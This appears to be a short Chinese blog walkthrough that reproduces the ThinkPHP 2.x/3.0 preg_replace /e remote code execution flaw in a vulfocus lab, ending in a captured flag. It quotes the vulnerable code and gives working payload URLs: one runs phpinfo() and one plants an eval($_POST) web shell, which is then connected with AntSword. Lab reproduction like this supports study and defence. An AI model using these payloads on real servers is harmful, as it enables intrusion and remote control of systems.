Hzktester`s Blog
0%

ThinkPHP 2.x 任意代码执行漏洞复现

发表于 更新于 分类于 阅读次数:
本文字数: 527 阅读时长 ≈ 1 分钟

漏洞详情

ThinkPHP 2.x版本中,使用 preg_replace/e 模式匹配路由:

1
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

环境搭建

使用vulfocous启动漏洞环境

image

打开就是ThinkPHP的默认页面

image

漏洞复现

直接访问 http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D 即可执行phpinfo():

image

然后接入一句话

1
/index.php?s=/index/index/xxx/${${@eval($_POST[1])}}

使用蚁剑连接

image

拿到flag

image